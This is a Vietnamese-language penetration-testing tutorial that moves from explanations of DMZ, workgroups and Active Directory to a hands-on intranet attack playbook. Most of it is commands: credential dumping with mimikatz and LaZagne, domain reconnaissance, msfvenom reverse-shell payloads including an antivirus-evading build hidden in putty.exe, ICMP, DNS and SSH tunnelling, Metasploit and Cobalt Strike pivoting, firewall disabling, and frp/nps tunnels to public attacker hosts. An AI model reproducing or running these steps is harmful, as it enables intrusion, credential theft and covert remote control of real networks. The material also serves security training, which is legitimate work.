Giới Thiệu Khái Niệm
DMZ (Khu Vực Trung Gian)
DMZ (Demilitarized Zone) là không gian nằm giữa hai tường lửa. So với Internet, DMZ cung cấp mức độ bảo mật cao hơn, nhưng thấp hơn so với mạng nội bộ.
DMZ là viết tắt của "demilitarized zone", được dịch sang tiếng Việt là "khu vực trung gian" hoặc "khu phi quân sự". Nó được thiết lập để giải quyết vấn đề người dùng từ mạng bên ngoài không thể truy cập các máy chủ mạng nội bộ sau khi cài đặt tường lửa. DMZ là một mạng nhỏ nằm giữa mạng nội bộ và mạng bên ngoài, nơi có thể đặt các máy chủ cần công khai như máy chủ web, FTP, diễn đàn, v.v. Cấu hình mạng này giúp bảo vệ hiệu quả hơn cho mạng nội bộ, vì nó tạo thêm một rào cản đối với kẻ tấn công từ bên ngoài.
Nhóm Làm Việc (Work Group)
Nhóm làm việc (Work Group) là một khái niệm trong mạng máy tính và là mô hình quản lý tài nguyên phổ biến nhất.
Các máy tính được phân loại theo chức năng hoặc phòng ban vào các nhóm khác nhau. Bằng cách tạo các nhóm làm việc khác nhau, các máy tính có thể được phân loại theo chức năng hoặc phòng ban, giúp mạng của toàn bộ tổ chức trở nên có cấu trúc phân cấp.
Chỉ cần tìm nhóm làm việc tương ứng trong "láng giềng mạng" của máy tính, người dùng có thể phát hiện tất cả các máy tính chứa trong đó và truy cập tài nguyên tương ứng.
Để tham gia hoặc tạo một nhóm làm việc rất đơn giản. Chỉ cần nhấp chuột phải vào biểu tượng "Máy tính" (hoặc "Máy tính này") trên màn hình hình nền, chọn "Thuộc tính" trong menu ngữ cảnh, nhấp "Thay đổi cài đặt" trong hộp thoại hiện ra, sau đó nhấp "Thay đổi" trong hộp thoại "Thuộc tính hệ thống", nhập tên tùy chỉnh vào ô "Tên máy tính" và tên nhóm làm việc cần tham gia vào ô "Nhóm làm việc", sau đó nhấp "OK" và khởi động lại máy tính. Lưu ý, nếu nhóm làm việc được chỉ định không tồn tại, một nhóm làm việc mới sẽ được tạo.
Mặc định, các máy tính trong mạng LAN đều sử dụng phương thức quản lý tài nguyên theo nhóm làm việc, tức là thuộc nhóm có tên WORKGROUP.
Khác Biệt Giữa Nhóm Làm Việc và Miền (Domain)
- Nhóm làm việc có phạm vi nhỏ, không cần quản lý máy chủ
- Môi trường miền có phạm vi lớn, số lượng máy chủ nhiều, cần có máy chủ quản lý
Máy Chủ Miền (Domain Controller - DC)
Máy chủ miền là máy chủ trong môi trường "miền" có trách nhiệm xác thực từng máy tính và người dùng kết nối vào mạng, tương tự như người bảo vệ tại một đơn vị. Nó được gọi là "máy chủ miền" (Domain Controller, viết tắt là DC).
Thông thường là máy chủ quản lý trong môi trường miền, có quyền hạn lớn.
Thư Mục Hoạt Động (Active Directory - AD)
Nó cung cấp một phương pháp mạnh mẽ để quản lý định danh và mối quan hệ của các thành tố trong môi trường mạng.
Active Directory chủ yếu cung cấp các chức năng sau:
- Dịch vụ mạng cơ bản: bao gồm DNS, WINS, DHCP, dịch vụ chứng thực, v.v.
- Quản lý máy chủ và máy khách: quản lý tài khoản máy chủ và máy khách, tất cả máy chủ và máy khách tham gia miền và thực thi chính sách nhóm.
- Dịch vụ người dùng: quản lý tài khoản miền, thông tin người dùng, danh bạ doanh nghiệp (tích hợp với hệ thống email), quản lý nhóm người dùng, xác thực danh tính, quản lý ủy quyền, v.v., thực thi chính sách quản lý nhóm theo nhu cầu.
- Quản lý tài nguyên: quản lý máy in, chia sẻ tệp và các tài nguyên mạng khác.
- Cấu hình máy tính để bàn: quản trị viên có thể tập trung cấu hình các chính sách máy tính để bàn khác nhau, như giới hạn chức năng giao diện, giới hạn đặc điểm thực thi ứng dụng, giới hạn kết nối mạng, giới hạn cấu hình bảo mật, v.v.
- Hỗ trợ ứng dụng: hỗ trợ hệ thống tài chính, nhân sự, email, cổng thông tin doanh nghiệp, tự động hóa văn phòng, quản lý bản vá, hệ thống chống virus và nhiều ứng dụng khác.
Một Miền (Single Domain)
Một miền là môi trường mạng chỉ có một miền. Trong một tổ chức có quy mô nhỏ, số lượng máy tính ít và vị trí địa lý cố định, việc thiết lập một miền riêng là đủ để đáp ứng nhu cầu.
Mẹ và Con (Parent and Child Domains)
Trong mạng, khi chia thành nhiều miền, miền đầu tiên được gọi là miền mẹ, các miền của các chi nhánh được gọi là miền con của miền đó. Trong cùng một miền, số lượng mục tương tác lớn và không bị nén, giữa các miền khác nhau, số lượng mục tương tác tương đối ít và có thể được nén. Mỗi miền có chính sách bảo mật riêng.
Cây Miền (Domain Tree)
Cây miền là tập hợp gồm nhiều miền được liên kết với nhau bằng mối quan hệ tin cậy.
Rừng Miền (Domain Forest)
Rừng miền là tập hợp gồm nhiều cây miền được liên kết với nhau bằng mối quan hệ tin cậy.
Thu Thập Thông Tin
Rò Rỉ Thông Tin Nhạy Cảm
Thu thập mật khẩu từ các dịch vụ giao thức máy tính khác nhau - LaZagne (tất cả), xenArmor (Windows), plugin Cobalt Strike
- https://github.com/gentilkiwi/mimikatz/
- https://github.com/Alessandroz/LaZagne
- https://github.com/huntergregal/mimipenguin
- https://xenarmor.com/allinone-password-recovery-pro-software/
- Tệp sao lưu mã nguồn trang web, tệp sao lưu cơ sở dữ liệu, v.v.
- Các cổng quản lý web cơ sở dữ liệu khác nhau, như PHPMyAdmin
- Mật khẩu đã lưu trong trình duyệt, cookie trình duyệt
- Phiên làm việc của người dùng khác, bản ghi kết nối 3389 và ipc$, nội dung thùng rác
- Mật khẩu WIFI đã lưu của Windows
- Các tài khoản và mật khẩu khác trong mạng nội bộ, như: Email, VPN, FTP, OA, v.v.
Thông Tin Cơ Bản Máy Tính
Mục tiêu là hiểu thông tin cơ bản của máy chủ hiện tại, để chuẩn bị cho việc xác định vai trò máy chủ, môi trường mạng, v.v. trong các bước tiếp theo.
- systeminfo - thông tin chi tiết
- net start - dịch vụ đang khởi động
- tasklist - danh sách tiến trình
- schtasks - công việc được lên lịch
Thu Thập Thông Tin Mạng
Mục tiêu là hiểu thông tin giao diện mạng của máy chủ hiện tại, để chuẩn bị cho việc xác định vai trò, chức năng, kiến trúc mạng hiện tại.
- ipconfig /all - xác định xem có miền không (DNS)
Có mục "DNS hậu tố chính" cho biết có môi trường miền. - net view /domain - xác định xem có miền không
Hiển thị phản hồi của miền. - net time /domain - xác định miền chủ
Có thể sử dụng nslookup và ping để phát hiện địa chỉ IP của máy chủ.
Thông thường thời gian sẽ được đồng bộ với thời gian của máy chủ miền, vì vậy thời gian trong hình là thời gian của máy chủ miền. - netstat -ano - các cổng mạng hiện tại đang mở
- nslookup tên miền - theo dõi địa chỉ nguồn
Có thể sử dụng ping để theo dõi.
Thu Thập Thông Tin Người Dùng
Mục tiêu là hiểu thông tin người dùng và nhóm người dùng trên máy tính hoặc trong môi trường miền, để sử dụng thông tin xác thực cho kiểm tra sau này.
Người dùng mặc định phổ biến:
- Domain Admins - Quản trị viên miền (mặc định có quyền kiểm soát đầy đủ đối với máy chủ miền)
- Domain Computers - Máy trong miền
- Domain Controllers - Máy chủ miền
- Domain Guest - Khách miền, quyền hạn thấp
- Domain Users - Người dùng miền
- Enterprise Admins - Người dùng quản trị hệ thống doanh nghiệp (mặc định có quyền kiểm soát đầy đủ đối với máy chủ miền)
Các lệnh thu thập thông tin người dùng liên quan:
- whoami /all - quyền người dùng
- net config workstation - thông tin đăng nhập
- net user - người dùng cục bộ
- net localgroup - nhóm người dùng cục bộ
- net user /domain - thông tin người dùng miền
- net group /domain - thông tin nhóm người dùng miền
- wmic useraccount get /all - thông tin chi tiết người dùng miền
- net group "Domain Admins" /domain - truy vấn tài khoản quản trị viên miền
- net group "Enterprise Admins" /domain - truy vấn nhóm quản trị viên
- net group "Domain Controllers" /domain - truy vấn máy chủ miền
Thu Thập Thông Tin Xác Thực
Mục tiêu là thu thập các mật mã, văn bản rõ, mật khẩu, v.v., để chuẩn bị cho kiểm tra xâm ngang ngang hàng sau này.
- NHASH và mật văn bản rõ của người dùng máy tính - mimikatz (Windows), mimipenguin (Linux)
Windows: Mimikatz cần nâng cấp quyền thành người dùng hệ thống hoặc quản trị viên trước khi thực hiện để tạo mật khẩu quản trị viên. Nếu không nâng cấp, người dùng miền không có quyền thực hiện.
Linux: Mimipenguin
https://github.com/huntergregal/mimipenguin/
Chỉ hỗ trợ các phiên bản sau: - Thu thập mật khẩu từ các dịch vụ giao thức máy tính khác nhau - LaZagne (tất cả), XenArmor (Windows)
CS Plugin:
LSTAR: https://github.com/lintstar/LSTAR
Ladon: https://github.com/k8gege/Ladon
OLA: https://github.com/d3ckx1/OLa
TaoWu: https://github.com/pandasec888/taowu-cobalt-strike
LaZagne (hỗ trợ toàn hệ thống): Quét mật khẩu cục bộ, WIFI, mật khẩu trình duyệt, mật khẩu đăng nhập, v.v.
https://github.com/AlessandroZ/LaZagne
XenArmor (Windows): Trả phí, có phiên bản cũ bị crack.
https://xenarmor.com/order-software/
Hiển thị mật khẩu WIFI đã lưu:
Netsh WLAN show profiles
Netsh WLAN show profile name="Tên WIFI" key=clear
- Tệp sao lưu mã nguồn trang web, tệp sao lưu cơ sở dữ liệu, v.v.
- Các cổng quản lý web cơ sở dữ liệu khác nhau, như PHPMyAdmin
- Mật khẩu đã lưu trong trình duyệt, cookie trình duyệt
- Phiên làm việc của người dùng khác, bản ghi kết nối 3389 và ipc$, nội dung thùng rác
- Mật khẩu WIFI đã lưu của Windows
- Các tài khoản và mật khẩu khác trong mạng nội bộ, như: Email, VPN, FTP, OA, v.v.
Dò Tìm Thông Tin Máy Chủ Miền và Địa Chỉ
net time /domain nslookyp ping
Dò Tìm Máy Chủ Hoạt Động Trong Miền và Địa Chỉ
Công cụ bên thứ ba
nbtscan 192.168.3.0/24 - công cụ bên thứ ba (không có bypass, cần tải về trên máy trong miền)
Lệnh tích hợp
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL="
Sử dụng lệnh tích hợp, không dễ bị chặn.
Script PowerShell bên thứ ba
nishang empire
Nishang
Chạy với quyền quản trị viên
Nhập mô-đun nishang
Import-Module .\nishang.psm1
Thiết lập chính sách thực thi
Set-ExecutionPolicy RemoteSigned
Enter liên tục
Nhận hàm lệnh của mô-đun nishang
Get-Command -Module nishang
Nhận thông tin máy tính thông thường
Get-Information
Quét cổng (xem tệp trong thư mục tương ứng để cú pháp minh họa, các tính năng khác tương tự)
Invoke-Portscan -StartAddress 192.168.3.0 -EndAddress 192.168.3.100 -ResolveHost -ScanPort
Tính năng khác: xóa bản vá, shell ngược, thu thập xác thực, v.v.
Công Nghệ Đường Hầm
Khác Biệt Giữa Đường Hầm và Proxy
Công nghệ đường hầm: Giải quyết vấn đề kết nối lên mạng với các giao thức bị chặn (sử dụng giao thức có thể kết nối lên mạng để đóng gói và kết nối). Có thể hiểu là có tường lửa, phần mềm bảo vệ, v.v. hạn chế khiến một số giao thức không thể giao tiếp bình thường.
Công nghệ proxy: Giải quyết vấn đề giao tiếp mạng bị gián đoạn (sử dụng máy trung gian để tạo nút và các hoạt động tiếp theo). Có thể hiểu là các mạng đoạn khác nhau không thể giao tiếp.
Kết nối xuôi (Forward Connection) (dùng khi quy tắc ra bị hạn chế, máy chủ chủ động kết nối với máy bị kiểm soát, gửi yêu cầu vào trong)
msfvenom -p windows/x64/meterpreter/bind_tcp lhost=192.168.63.135 lport=6666 -f exe -o test.exe
Kết nối ngược (Reverse Connection) (dùng khi quy tắc vào bị hạn chế, chủ động kết nối với máy bị kiểm soát, gửi yêu cầu ra ngoài)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.200.134 lport=9999 -f exe -o demo2.exe
Thời Điểm Sử Dụng
Máy chủ chặn TCP ra, không chặn vào, không có mạng Internet
Kết nối xuôi (lấy quyền một máy chủ có thể giao tiếp với máy chủ và có mạng) - Máy chủ có mạng chủ động kiểm soát máy bị kiểm soát.
Máy chủ chặn TCP ra, không chặn vào, có mạng Internet
Kết nối xuôi (lấy quyền một máy chủ có thể giao tiếp với máy chủ và có mạng) - Máy chủ có mạng chủ động kiểm soát máy bị kiểm soát.
Công nghệ đường hầm (sử dụng các giao thức khác để ra mạng).
Đóng Gói Giao Thức ICMP
Khi máy chủ đích có thể ping ra ngoài nhưng bị tắt http, có thể sử dụng giao thức ICMP để đóng gói và đi đường hầm.
Quy trình:
- Tạo backdoor cục bộ
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.200.134 lport=9999 -f exe -o demo2.exe
- MSF bắt đầu lắng nghe:
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 4444 exploit
- Kali bật đường hầm
./pingtunnel -type server
Windows bật đường hầm // Chuyển tiếp dữ liệu giao thức icmp từ cục bộ 3333 đến cổng 4444 của 66ip (chạy với quyền quản trị viên)
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.46.66 -t 192.168.46.66:4444 -tcp -noprint 1 -nolog 1
Giao Tiếp Đường Hầm DNS
Xác định: nslookup dig
Máy chủ trong mạng chỉ có thể gửi dữ liệu giao thức DNS ra ngoài, giải quyết vấn đề giao tiếp.
Địa chỉ công cụ: https://github.com/yarrick/iodine
Xác định có thể ra ngoài: nslookup www.baidu.com
--- Máy chủ công cộng: Đặt mật khẩu xiaodi và tạo IP ảo cũng như liên kết tên miền
iodined -f -c -P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD
--- Máy khách đích: Kết nối mật khẩu xiaodi và liên kết tên miền
iodine -f -M -P xiaodi ns1.xiaodi8.com
--- Thử giao tiếp và kết nối
ssh root@192.168.0.2
Đường Hầm SSH
Bật đăng nhập giao thức SSH
vim /etc/ssh/sshd_config PermitRootLogin yes PasswordAuthentication yes /etc/init.d/ssh start /etc/init.d/ssh restart
Cục bộ: Chặn ra
ssh -CFNg -L 1122:192.168.1.15:8080 root@192.168.1.166 curl http://127.0.0.1:1122
Remote: Chặn vào
ssh -CFNg -R 1234:192.168.1.15:8080 root@47.94.236.117 curl http://127.0.0.1:1234
Công Nghệ Proxy
Proxy SOCKS
SOCKS4/4a SOCKS5
Phần mềm proxy
SocksCap, Proxifier, ProxyChains, v.v.
Proxifier
Đầu tiên tạo proxy SOCKS trong Cobalt Strike
Sao chép cổng
Mở Proxifier
Điền dữ liệu theo thứ tự
Phiên bản SOCKS theo phiên bản do CS tạo
Điền xong nhấp check để kiểm tra kết nối
Nếu kiểm bị treo, nhấp Test Settings ở góc trên bên phải
Phương pháp đầu tiên chỉ khởi động kiểm tra đầu tiên
Phương pháp thứ hai
Thiết lập chính xác IP mạng nội bộ đích
Thiết lập xong rồi kiểm tra lại là thành công
Sau đó thiết lập Rules
Thêm như sau
Sau đó chọn localhost, nhấp remove để xóa quy tắc localhost, chỉ để lại hai cái
Nhấp OK
Sau khi cấu hình xong, sử dụng Firefox có thể truy cập cổng mở của máy chủ mạng nội bộ đích
Giao Tiếp MSF
Proxy SOCKS
1. Thêm đường dẫn, giới hạn trong MSF
Xem thông tin đường dẫn
run autoroute -p
run post/multi/manage/autoroute
Thêm đường dẫn chỉ định, 1 là số nhận của session
route add 192.168.11.0 255.255.255.0 1
2. Proxy SOCKS, sử dụng chung toàn cục
use auxiliary/server/socks_proxy
set VERSION 4a (thay đổi theo thực tế)
set srvhost 0.0.0.0
set srvport 1115
run
Bắt đầu proxy, cấu hình proxy SOCKS
MSF + proxychains
Tạo đường dẫn
run post/multi/manage/autoroute
Xem đường dẫn
run autoroute -p
Quay lại MSF
Sử dụng auxiliary/server/socks_proxy module, xem options và điền tham số tương ứng
use auxiliary/server/socks_proxy options set VERSION 4a run
Sau khi run sẽ treo một job, có thể xem tình trạng treo bằng lệnh
jobs
Cài đặt proxychains4
apt install proxychains4
Cấu hình tệp proxychains, IP và lệnh trong tệp cấu hình phải giống như trong module
vim /etc/proxychains4.conf
Lưu xong, xem có thể nhận được trang web qua IP mạng nội bộ không
proxychains4 curl http://192.168.52.143/phpmyadmin
Giao Tiếp CS
Lệnh: socks 59578
Thao tác: Chuyển tiếp proxy ---> Proxy SOCKS
Backdoor Xuôi và Ngược
Xuôi
Sau khi backdoor thực thi, dữ liệu được gửi đến cổng 2222 cục bộ, bộ điều khiển kết nối đến cổng 2222 hiện tại.
Ngược
Sau khi backdoor thực thi, dữ liệu được gửi đến cổng 2222 từ xa, bộ điều khiển lắng nghe cổng 2222.
Điều Khiển Lên Dòng MSF (Xuôi)
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=1234 -f exe > 1.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.11.129
set lport 3333
run
Bypass
msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.93.87.217 LPORT=3333 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o aaa.exe
Điều Khiển Lên Dòng CS (Xuôi)
Nghe: bind_tcp port
Sử dụng proxy SOCKS
Lệnh: connect ip port
Thiết lập nghe mới
Sử dụng module cuối cùng để tấn công
Tải lên và thực thi trojan
Sau khi thực thi CS không trực tiếp lên dòng
Cần nhập lệnh trên máy đã lên dòng
connect ip port (ip và cổng CS tạo backdoor lúc trước)
Chờ một lúc, máy sẽ lên dòng
Lọc Lên Dòng Vào và Ra
Lọc Lên Dòng Vào
Môi trường mạng như hình
Ý tưởng: Lên dòng windows7 --- Kết nối xuôi --- Lên dòng windows10 --- windows2008 kết nối ngược windows10 --- windows2008 đi đường hầm SMB kết nối xuôi windows2012
Công Nghệ Đường Hầm
HTTP/S, DNS, SSH, ICMP, SMB, v.v. xuyên tường
Đường hầm SMB lên dòng
Tình huống
Tường lửa chặn tất cả cảng giao thức, chỉ mở SMB có thể kết nối máy in
Giao thức SMB
Giao thức chia sẻ tệp, dùng cho cổng 445, thường dùng cho máy in
Tạo SMB listener, tạo đường ống
Sử dụng máy bị kiểm soát quét và dò tìm máy đích, xem có cổng 445 không
Sau khi quét, xem danh sách mục tiêu
Xu hiện máy đích
Chọn máy đích để di chuyển ngang
Cuối cùng lên dòng (chưa cấu hình tốt môi trường, dùng hình của tổng đế thay thế) và vẫn là system, di chuyển ngang自带提权
Đường hầm DNS lên dòng
Tình huống
Nguyên lý
DNS khi truyền vùng dùng TCP
DNS khi phân giải tên miền dùng UDP
Nếu tường lửa tắt TCP, UDP vẫn có thể dùng
Tình huống áp dụng
Máy đích có thể ping www.baidu.com (dùng ICMP)
Nhưng máy đích không thể truy cập trang web Baidu (tường lửa chặn giao tiếp TCP)
Máy đích có thể phân giải www.baidu.com qua nslookup (giao thức DNS có thể giao tiếp)
Điều kiện sử dụng
Cần chuẩn bị tên miền
Sau khi lên dòng, nhập lệnh
mode dns-txt
Lên dòng thành công
Bỏ Qua Kết Nối Ngược
Đầu tiên chuyển tiếp proxy của máy bị kiểm soát
Máy nghe cần đổi thành IP cùng đoạn mạng có thể giao tiếp với IP mạng nội bộ khác, đảm bảo kết nối mạng
Sau đó tạo trojan
Cuối cùng thực thi trojan để lên dòng
Tắt & Xóa & Thay Thế
Áp dụng cho môi trường mạng nội bộ đơn thuần, môi trường miền nội bộ đơn thuần (máy chủ miền không đặt chính sách tường lửa đồng bộ)
Trong trường hợp có quyền quản trị viên, sử dụng lệnh tắt tường lửa, xóa chính sách tường lửa, thay thế chương trình tường lửa
Lệnh thao tác tường lửa Windows
Hỗ Trợ Hệ Thống Linux MAC IOS Android Lên Dòng
Plugin
https://github.com/gloxec/CrossC2
Tham khảo sử dụng
https://gloxec.github.io/CrossC2/zh_cn
Phiên bản hiện tại chỉ hỗ trợ https ngược và tcp xuôi
- Tải xuống phiên bản tương ứng của loader và plugin CNA
- Tải lên tệp loader và tải plugin CNA cục bộ
- Thay đổi đường dẫn cấu hình plugin CNA và tải lên tệp key
- Sử dụng lệnh hoặc plugin để liên kết listener HTTPS và tạo
Xuyên Tường Mạng Nội Bộ
Dự Án Xuyên Tường
Ưu điểm: Mã hóa dữ liệu xuyên tường, nền tảng trung gian, chống theo dõi, giải quyết vấn đề mạng
Ngrok (dành cho người mới) không khuyến nghị
frp (đơn giản)
https://github.com/fatedierfrp
spp (tùy chỉnh)
nps (giao thức đặc biệt)
https://github.com/ehang-io/nps
EW (ngừng cập nhật)
http://www.rootkiter.com/EarthWorm
FRP
Máy chủ - tải xuống - giải nén - sửa đổi - khởi động (cấu hình an toàn nhập xuất của máy chủ Alibaba Cloud)
Máy chủ sửa đổi tệp cấu hình frps.ini
[common] bind_port=7000
Khởi động máy chủ
./frps -c ./frps.ini
Máy điều khiển - tải xuống - giải nén - sửa đổi - khởi động
Máy điều khiển sửa đổi tệp cấu hình frpc.ini
[common] server_add=xx.xx.xx.xx (IP công cộng) server_ip=7000 #cổng làm việc của frpc, phải giống frps ở trên [ssh] type=tcp local_ip=127.0.0.1 local_port=5555 #chuyển tiếp đến cục bộ 5555 remote_port=6000 #cổng 6000 của máy chủ chuyển tiếp đến cục bộ
Khởi động máy khách
./frpc -c ./frpc.ini msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx(IP công cộng) lport=6000 -f exe -o a.exe use exploit/multi/handler set payload windows/meterpreter/reverse_tcp
NPS
Máy chủ
Khởi động
./nps install ./nps http://ip:8024 admin/123
Tạo máy khách, tạo khóa
Thêm đường hầm giao thức, liên kết hướng đến
Liên kết từ xa 5555, hướng đến cục bộ 6666
Máy khách
- Kết nối máy chủ
./nps -server=xx.xx.xx.xx:8024(IP công cộng) -vkey=uajwhbu9155qh8 9v
-
>Tạo backdoor
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx(IP công cộng) lport=5555 -f exe -o nps.exe
-
>Nghe backdoor
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 6666 run
SPP
Máy chủ
./spp -type server -proto ricmp -listen 0.0.0.0
Máy khách
spp -name "test" -type proxy_client -server xx.xx.xx.xx(IP công cộng) -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp
CS
Listener 1:
http xx.xx.xx.xx (IP công cộng) 8081
Listener 2:
http 127.0.0.1 8082
Tạo backdoor: Listener 2